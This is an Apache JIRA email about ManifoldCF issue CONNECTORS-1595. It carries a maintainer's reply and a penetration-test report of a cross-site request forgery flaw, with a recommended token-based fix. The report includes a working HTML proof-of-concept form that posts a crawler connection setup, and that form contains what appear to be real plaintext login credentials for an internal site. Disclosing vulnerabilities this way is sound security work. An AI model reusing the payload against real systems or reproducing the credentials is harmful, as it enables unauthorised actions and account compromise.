[ 
https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803802#comment-16803802
 ] 

Karl Wright commented on CONNECTORS-1595:
-----------------------------------------

[~goovaertsr]: For all of the security tickets you have submitted against MCF, 
we have no ability to address these ourselves; this is a small project and 
essentially you are attempting to make the MCF UI safe to operate in an open 
web environment.  That was not its design point, either at the beginning or 
ever.

We are always receptive to patches, so if you have specific code changes you 
want us to consider, please feel free to attach appropriate patches to the 
tickets you have created.

Thank you.


> cross-site request forgery vulnerability
> ----------------------------------------
>
>                 Key: CONNECTORS-1595
>                 URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
>             Project: ManifoldCF
>          Issue Type: Improvement
>          Components: API
>    Affects Versions: ManifoldCF 2.12
>            Reporter: roel goovaerts
>            Priority: Minor
>
> Below is the full analysis and description as a result from the penetration 
> test.
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing 
> to the attacked application. The image source would actually be a URL with 
> parameters pointing to the application page that performs some action. In 
> case of a form, the form action would point to the action page in the target 
> application, and the form is submitted automatically by JavaScript when the 
> page is viewed.
> 2. The attacker tricks the victim user into browsing to this page. The 
> attacker may get the victim to click a link, or embed the attacking HTML code 
> into some page the victim views, for example in a bulletin board or chat.
> 3. When the victim views the attacker's page, his browser sends a request 
> prepared by the attacker to the attacked application. If the victim is logged 
> in to the target application, his browser will possess all necessary session 
> tokens, so the request will appear as authorized to the application and 
> succeed.
> A cross-site request forgery attack uses the fact that the victim's browser 
> possesses the necessary authentication tokens to perform some actions in the 
> target application.
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into 
> clicking a link crafted by the attacker or opening a malicious web page can 
> force the victim to unknowingly perform various actions within the 
> application.
> Given that the whole application is not protected against CSRF, any action 
> that an administrator can take on Apache Manifold could be unknowingly 
> performed if they fall for a CSRF attack.
> *Affected Systems*
>  * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
> *Description*
> It appears that the application does not implement any CSRF protection. 
> Consider the following example. An attacker tricks a logged-in application 
> user into visiting a page containing the following code:
> {code:java}
> <html>
> <!-- CSRF PoC - generated by Burp Suite Professional -->
> <body>
> <script>history.pushState('', '', '/')</script>
> <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp"
> method="POST" enctype="multipart/form-data">
> <input type="hidden" name="op" value="Save" />
> <input type="hidden" name="type" value="connection" />
> <input type="hidden" name="tabname" value="Name" />
> <input type="hidden" name="isnewconnection" value="false" />
> <input type="hidden" name="connname" value="clix&#45;fr" />
> <input type="hidden" name="description" value="" />
> <input type="hidden" name="classname"
> value="org&#46;apache&#46;manifoldcf&#46;crawler&#46;connectors&#46;webcrawler&#46;WebcrawlerConnector" />
> <input type="hidden" name="authorityname" value="&#95;none&#95;" />
> <input type="hidden" name="throttlecount" value="0" />
> <input type="hidden" name="maxconnections" value="10" />
> <input type="hidden" name="email" 
> value="ferdi&#46;klomp&#64;craftworkz&#46;nl" />
> <input type="hidden" name="robotsusage" value="none" />
> <input type="hidden" name="metarobotstagsusage" value="all" />
> <input type="hidden" name="regexp&#95;bandwidth&#95;0" value="" />
> <input type="hidden" name="insensitive&#95;bandwidth&#95;0" value="false" />
> <input type="hidden" name="connections&#95;bandwidth&#95;0" value="2" />
> <input type="hidden" name="rate&#95;bandwidth&#95;0" value="64" />
> <input type="hidden" name="fetches&#95;bandwidth&#95;0" value="12" />
> <input type="hidden" name="bandwidth&#95;count" value="1" />
> <input type="hidden" name="acredential&#95;count" value="0" />
> <input type="hidden" name="scredential&#95;0&#95;regexp"
> value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc&#47;" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;regexp" value="login" 
> />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;type" value="form" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;matchregexp"
> value="validation" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;overridetargeturl" 
> value=""
> />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;param"
> value="username" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;value"
> value="id996812" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;param"
> value="password" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;value"
> value="Th1sIs4cl1X" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;op"
> value="Continue" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;param"
> value="login&#45;form&#45;type" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;value" 
> value="pwd" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;password" 
> value="" />
> <input type="hidden" name="scredential&#95;0&#95;0&#95;loginparamcount"
> value="3" />
> <input type="hidden" name="scredential&#95;0&#95;loginpagecount" value="1" />
> <input type="hidden" name="scredential&#95;count" value="1" />
> <input type="hidden" name="regexp&#95;trust&#95;0"
> value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc" />
> <input type="hidden" name="trustall&#95;trust&#95;0" value="false" />
> <input type="hidden" name="trust&#95;count" value="1" />
> <input type="hidden" name="proxyhost" value="" />
> <input type="hidden" name="proxyport" value="" />
> <input type="hidden" name="proxyauthusername" value="" />
> <input type="hidden" name="proxyauthdomain" value="" />
> <input type="hidden" name="proxyauthpassword" value="" />
> <input type="hidden" name="client&#95;timezone&#95;offset" value="&#45;60" />
> <input type="hidden" name="client&#95;timezone" value="Europe&#47;Zurich" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will 
> cause them to execute any action of the attacker's choosing on Manifold.
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with 
> an unpredictable value to each form or link that performs some action in the 
> application, commonly referred to as a CSRF token. The parameter value should 
> have enough entropy so that it cannot be predicted by an attacker and should 
> be unique to the current user session. When the user submits the form or 
> clicks the link, the server-side code checks the parameter value. If it is 
> valid, the request is accepted, otherwise it is denied. The attacker has no 
> way of knowing the value of the unpredictable parameter, so he cannot 
> construct a form or link that will submit a valid request.
> *References*
>  * OWASP - Cross-Site Request Forgery - 
> [https://www.owasp.org/index.php/Cross-Site_Request_Forgery]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)